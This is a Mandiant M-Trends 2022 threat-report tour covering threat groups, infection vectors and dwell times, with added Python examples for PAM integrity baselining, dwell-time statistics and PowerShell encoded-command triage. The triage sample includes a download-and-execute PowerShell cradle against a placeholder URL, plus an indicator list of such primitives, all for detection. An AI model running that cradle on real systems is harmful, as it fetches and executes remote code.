MANDIANT SPECIAL REPORT TOUR
M-Trends is an annual report that provides the latest frontline incident response and threat intelligence findings from high-impact cyber attacks and global remediations.
Our 2022 edition is based on Mandiant investigations and engagements performed from October 1, 2020 through December 31, 2021.
Scroll down to explore a sample of the findings in this online tour or download the full report.
© Copyright 2021 Mandiant. All rights reserved.
Discover more details, learnings and mitigation strategies
READ THE FULL REPORT
UNC2891
Mandiant has observed UNC2891 targeting Linux and Unix environments, with a strong focus on Oracle Solaris-based systems.
This threat group uses its vast knowledge of Linux/Unix to remain hidden (sometimes for years) as it moves within an environment.
UNC2891 achieves its mission in part through custom backdoors that target Linux authentication modules and custom malware built to evade detection.
More recently, UNC2891 has also begun targeting ATMs for financial gain using sophisticated Linux-targeting malware.
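The "custom backdoors that target Linux authentication modules" above are a case where a content-hash baseline of the module directory catches what file names and timestamps do not. The following is an added example written for this tour, not Mandiant's code; it assumes the modules in question are PAM shared objects (the page says only "Linux authentication modules") plus the /etc/pam.d stack files, runs against a constructed temporary directory of fake module files so it works offline, and pam_extra.so is a made-up name.

```python
"""Content-hash baseline for a Linux authentication (PAM) module directory.

Added example, not Mandiant's code. Assumes the modules of interest are PAM
shared objects (e.g. under /lib/security or /lib/x86_64-linux-gnu/security)
and the /etc/pam.d stack files; each is passed in as a directory path.
"""
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(module_dir: str) -> Dict[str, str]:
    """Map relative path -> SHA-256 for every regular file under module_dir.

    Symlinks are followed on purpose: repointing a link is one way to swap
    pam_unix.so without changing the name the PAM stack references.
    mtimes are ignored on purpose: they are trivially restored (touch -r).
    """
    out: Dict[str, str] = {}
    for root, _subdirs, files in os.walk(module_dir):
        for name in files:
            path = os.path.join(root, name)
            if os.path.isfile(path):
                out[os.path.relpath(path, module_dir)] = sha256_of(path)
    return out


def diff(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Added, removed and content-changed files. On an authentication module
    directory any non-empty list is a finding until a package update explains it."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario in a temp dir: baseline two fake modules, then
    overwrite pam_unix.so with a same-length file and restore its mtime, and
    drop an extra module (pam_extra.so is a made-up name). Returns the diff."""
    mod_dir = tempfile.mkdtemp(prefix="pam-demo-")
    try:
        unix = os.path.join(mod_dir, "pam_unix.so")
        with open(unix, "wb") as fh:
            fh.write(b"\x7fELF" + b"\x00" * 60)      # stand-in bytes, not a real ELF
        with open(os.path.join(mod_dir, "pam_deny.so"), "wb") as fh:
            fh.write(b"\x7fELF" + b"\x01" * 60)
        before = snapshot(mod_dir)

        st = os.stat(unix)
        with open(unix, "wb") as fh:                  # same length, one byte differs
            fh.write(b"\x7fELF" + b"\x00" * 59 + b"\x01")
        os.utime(unix, (st.st_atime, st.st_mtime))    # attacker puts the mtime back
        with open(os.path.join(mod_dir, "pam_extra.so"), "wb") as fh:
            fh.write(b"\x7fELF" + b"\x02" * 60)
        return diff(before, snapshot(mod_dir))
    finally:
        shutil.rmtree(mod_dir, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Take the baseline from a known-good image or immediately after a clean package install, never from a host already under suspicion, and keep it off-host. Package-manager verification (`rpm -V pam` on RPM systems, `debsums` or `dpkg -V libpam-modules` on Debian-derived ones) is a useful cross-check, but an attacker who also edits the package database defeats it, whereas an off-host baseline has to be attacked separately. Snapshot /etc/pam.d as well: a dropped module file does nothing until a stack line references it, and that line is the other half of the backdoor.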
FIN13
UNC886 graduated to FIN13, a financially motivated threat group that has been active since 2016 and targets organizations based in Mexico.
FIN13 monetizes intrusions by collecting information required to conduct fraudulent financial transfers from company point-of-sale (POS) systems and ATMs into attacker-controlled accounts (a relatively unique approach). They can persist in victim environments for several years.
They have shifted from the near-exclusive use of traditional web shells to BLUEAGAVE (a PowerShell or Perl-based passive backdoor).
Regional targeting has been more common within Latin American cyber crime communities. Many of the publicly available tools and web shells used by FIN13 were modified to contain Spanish-language code elements.
FIN12
UNC1878 graduated to FIN12, a financially motivated threat group behind prolific RYUK ransomware attacks since 2018. FIN12 intrusions comprised nearly 20% of Mandiant ransomware investigations during this reporting period.
FIN12 prioritizes rapid ransomware deployment.
FIN12 relies heavily on partners to obtain initial access into victim environments.
As of February 2020, FIN12 used Cobalt Strike BEACON payloads in nearly every intrusion.
Mandiant expects FIN12 to broaden its regional focus from the U.S. to other nations, including Western Europe and Asia-Pacific.
NOTABLE AND RECENTLY GRADUATED THREAT GROUPS
WHO ARE TODAY'S ATTACKERS?
THREAT GROUPS 2021
Unclassified Threat Groups (UNC): a cluster of cyber intrusion activity with observable artifacts that requires further analysis before a specific classification can be provided.
Financially Motivated Threat Actor (FIN)
• Mandiant tracked 1,141 UNC groups, 13 FIN groups and 40 APT groups in 2021
What do they target?
Active Directory Misconfigurations
In 2021, Mandiant observed a high volume of compromises attributed to vulnerabilities and misconfigurations in on-premises Active Directory and cloud-based infrastructures, resulting in an expanded attack surface for successful privilege escalation and both lateral and vertical movement by attackers.
THE TOP 5 MOST TARGETED INDUSTRIES
DATA THEFT
Attackers continue to prioritize data theft as a primary mission objective.
29% of intrusions involved data theft in 2021, a 3-point decrease from 2020.
FINANCIAL GAIN
3 out of 10 intrusions stemmed from attackers seeking monetary gain through methods such as extortion, ransom, payment card theft and illicit transfers.
Financially motivated attacks dropped to 30% in 2021 compared to 38% in 2020.
A likely contributing factor for this decrease in 2021 was an increase in law enforcement action leading to arrests, takedown of servers and seizure of extorted funds.
MITRE ATT&CK
70% of MITRE ATT&CK techniques and 46% of sub-techniques were used by attackers.
30% of all techniques were seen in more than 5% of intrusions.
Initial Infection Vector, 2021
Exploits
Exploits remained the most frequently identified initial infection vector. In 37% of intrusions, attackers leveraged exploits to gain access, an eight-point increase in intrusions commencing with an exploit compared to 2020.
Supply chain compromise
Supply chain compromise was the second most prevalent initial infection vector, accounting for 17% of intrusions with an identified vector. 86% of these intrusions were related to the SolarWinds breach and SUNBURST.
Prior compromise
Prior compromise (handoffs from one group to another and past malware infections) grew as an initial infection vector, accounting for 14% in 2021.
Phishing
Phishing intrusions dropped to 11% in 2021 compared to 23% in 2020, a 12-point decrease from the previous reporting period. Organizations are better at detecting and blocking this infection vector with enhanced employee training to recognize and report phishing attempts.
Intrusions saw adversaries use obfuscation (such as encryption or encoding) to make detection and subsequent analysis more difficult.
Where do they attack?
Regional Dwell Time and Ransomware Highlights
When are attackers found?
Global Median Dwell Time: the number of days an attacker is present in a target's environment before they are detected.
Global Median Dwell Time, 2011-2021
Change in Global Median Dwell Time: 24 days in 2020, 21 days in 2021
Since 2011, global median dwell time has dropped from over ONE YEAR to less than ONE MONTH. And in the last year alone, global median dwell time dropped to 21 DAYS, 3 days lower than in 2020.
How are they found?
Detection by Source by Region, 2021
GLOBAL Detection by Source, 2011-2021
Internal detection by organizations has a median dwell time of 18 days compared to 28 days for external notification. The percentage of intrusions detected internally trended upwards with moderate fluctuation over the last six years.
Internal detection: an organization independently discovers it has been compromised.
External notification: an outside entity informs an organization of compromise (including notification by an attacker via extortion note).
Internal detection in 2021 (18 days) was significantly faster than external notification, but slower compared to 2020 (12 days). Mandiant is not surprised by this data because last year's figure represented an all-time low.
External notifications were reported in half the time in 2021 compared to 2020. This is due in part to improved information sharing capabilities and communication mechanisms.
In APAC and EMEA, most intrusions were identified externally in 2021—a reversal of what was observed in 2020.
In the Americas, detection by source held steady with most intrusions detected internally.
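To apply the definitions above to an organization's own case data: dwell time is the number of days from the earliest evidence of attacker presence to the day of detection, and the median is then taken per detection source and per region. The following is an added example for this tour, not Mandiant's code or data; the intrusion records are constructed and the medians they produce are illustrative only. A record whose detection date precedes its first evidence is treated as a data error and excluded rather than silently skewing the median.

```python
"""Median dwell time by detection source and region, per the tour's definitions.

Added example, not Mandiant's code or data. The records in SAMPLE are
constructed; the medians they yield are illustrative only.
"""
from dataclasses import dataclass
from datetime import date
from statistics import median
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class Intrusion:
    region: str           # "Americas", "APAC" or "EMEA"
    source: str           # "internal" (found by the organization) or "external" (told by an outsider)
    first_evidence: date  # earliest attacker activity found during the investigation
    detected: date        # day the organization learned it was compromised


def dwell_days(i: Intrusion) -> Optional[int]:
    """Days the attacker was present before detection, or None when the record
    is inconsistent (detection dated before the earliest evidence)."""
    d = (i.detected - i.first_evidence).days
    return d if d >= 0 else None


def median_dwell(records: List[Intrusion],
                 key: Optional[Callable[[Intrusion], str]] = None) -> Dict[str, float]:
    """Median dwell time overall (key=None) or per group (key returns the group name).
    Inconsistent records are dropped from the median, not counted as zero."""
    groups: Dict[str, List[int]] = {}
    for r in records:
        d = dwell_days(r)
        if d is None:
            continue
        groups.setdefault("all" if key is None else key(r), []).append(d)
    return {g: median(v) for g, v in groups.items()}


def by_source(records: List[Intrusion]) -> Dict[str, float]:
    return median_dwell(records, key=lambda r: r.source)


def by_region(records: List[Intrusion]) -> Dict[str, float]:
    return median_dwell(records, key=lambda r: r.region)


def internal_share(records: List[Intrusion], region: Optional[str] = None) -> float:
    """Fraction of intrusions detected internally, overall or for one region."""
    sel = [r for r in records if region is None or r.region == region]
    if not sel:
        raise ValueError("no records for region %r" % region)
    return sum(r.source == "internal" for r in sel) / len(sel)


# Constructed records (not Mandiant data).
SAMPLE = [
    Intrusion("Americas", "internal", date(2021, 3, 1), date(2021, 3, 11)),
    Intrusion("Americas", "internal", date(2021, 5, 2), date(2021, 5, 22)),
    Intrusion("Americas", "external", date(2021, 6, 1), date(2021, 7, 1)),
    Intrusion("APAC", "external", date(2021, 1, 10), date(2021, 2, 4)),
    Intrusion("APAC", "external", date(2021, 8, 1), date(2021, 8, 16)),
    Intrusion("APAC", "internal", date(2021, 9, 5), date(2021, 9, 12)),
    Intrusion("EMEA", "external", date(2021, 2, 1), date(2021, 4, 2)),
    Intrusion("EMEA", "internal", date(2021, 10, 1), date(2021, 10, 19)),
    Intrusion("EMEA", "external", date(2021, 11, 5), date(2021, 11, 1)),  # inconsistent dates
]

if __name__ == "__main__":
    print("global:", median_dwell(SAMPLE))
    print("by source:", by_source(SAMPLE))
    print("by region:", by_region(SAMPLE))
    print("internal share:", round(internal_share(SAMPLE), 2))
```

Detection source is kept for the share calculation even when the dates are bad, since the source field is independent of the date error; when such a record shows up in real case data, the usual cause is that the investigation later uncovered earlier activity and the first-evidence date was updated without the detection date being checked.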
Advanced Persistent Threat (APT): threat actors focused on espionage activities.
*Mandiant tracks Advanced Persistent Threat (APT) groups 0-41. Over the years, APT11 and APT13 were merged into other groups and subsequently deprecated, resulting in 40 APT groups actively tracked by Mandiant.
The most targeted industries remain generally consistent each year, but their relative rankings do change.
Attackers use what they find in victim environments. The most frequently observed sub-techniques were web protocols (32%), PowerShell (29.4%), file deletion (27.1%), system services (26.5%), and Remote Desktop Protocol (23.4%).
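The obfuscation point made earlier (attackers encoding or encrypting what they run to hinder detection and analysis) and the PowerShell sub-technique figure above meet in the most common concrete case: powershell.exe launched with -EncodedCommand. The following is an added example for this tour, not Mandiant's code, that decodes such command lines from process-creation logs and flags the strings an analyst reads for first. The command lines and the indicator list are constructed for the demo, and http://example.invalid/a is a placeholder URL.

```python
"""Decode and triage PowerShell -EncodedCommand invocations from process logs.

Added example, not Mandiant's code. SAMPLE_CMDLINES and the indicator list are
constructed for this demo; http://example.invalid/a is a placeholder URL.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# (name, regex) pairs an analyst looks for first in a decoded script; extend as needed.
INDICATORS = (
    ("invoke-expression", r"invoke-expression"),
    ("iex", r"\biex\b"),
    ("downloadstring", r"downloadstring"),
    ("net.webclient", r"net\.webclient"),
    ("frombase64string", r"frombase64string"),
    ("invoke-webrequest", r"invoke-webrequest"),
)


def encode_powershell(script: str) -> str:
    """What -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell; raises on junk so callers can flag it."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts -EncodedCommand, the alias -ec, and any unambiguous
    prefix of the full name (-e, -en, -enc, ...). -ExecutionPolicy is not one."""
    t = token.lstrip("-/").lower()
    return t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t))


def extract_blob(cmdline: str) -> Optional[str]:
    """The argument following the encoded-command flag, or None if there is none."""
    toks = cmdline.split()
    if not toks or not re.search(r"(?i)powershell|pwsh", toks[0]):
        return None                     # the flag only means something to the PowerShell host
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] in "-/" and is_encoded_flag(tok):
            return toks[i + 1].strip("\"'")
    return None


def analyze(cmdline: str) -> Dict[str, object]:
    """Triage one process command line: encoded?, decoded text, decode error, indicators."""
    out: Dict[str, object] = {"encoded": False, "decoded": None, "error": None, "indicators": []}
    blob = extract_blob(cmdline)
    if blob is None:
        return out
    out["encoded"] = True
    try:
        decoded = decode_powershell(blob)
    except binascii.Error:
        out["error"] = "invalid-base64"   # bad alphabet or padding: still worth a look
        return out
    except UnicodeDecodeError:
        out["error"] = "not-utf16le"      # valid base64 but not what PowerShell would run
        return out
    out["decoded"] = decoded
    low = decoded.lower()
    out["indicators"] = [name for name, rx in INDICATORS if re.search(rx, low)]
    return out


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Analyses for every line that carried an encoded command, in input order."""
    return [a for a in (analyze(c) for c in cmdlines) if a["encoded"]]


# Constructed process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -enc " + encode_powershell(r"Get-Process | Out-File C:\temp\procs.txt"),
    "powershell.exe -nop -w hidden -e "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    "powershell.exe -EncodedCommand !!!not-base64!!!",
]

if __name__ == "__main__":
    for a in triage(SAMPLE_CMDLINES):
        print(a)
```

The host check keys on the image name, so a copied or renamed powershell.exe slips past it; in real telemetry key on the PE's OriginalFileName (Sysmon Event ID 1 carries it) instead. The indicator list is a triage aid, not a detection on its own, and a decoded script that itself calls FromBase64String or a decompression routine needs a further decode pass before it is readable.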
Americas
Median dwell time remained constant at 17 days in 2021 compared to 2020. 22% of intrusions were related to ransomware.
APAC
Median dwell time was 21 days in 2021 compared to 76 days in 2020, a 72% improvement. 38% of intrusions in 2021 were ransomware-related, compared to only 12.5% in 2020.
EMEA
Median dwell time was 48 days in 2021 compared to 66 days in 2020. Fewer investigations were ransomware-related: 17% in 2021 compared to 22% in 2020.
Median Dwell Time for all ransomware investigations: 5 days. FIN12: less than 2 days.
Financially Motivated Threat Actor (FIN): monetized operations via methods such as, but not exclusive to, ransomware deployment and payment card data theft.
• Two new FIN groups were named
• One new, significant UNC group was announced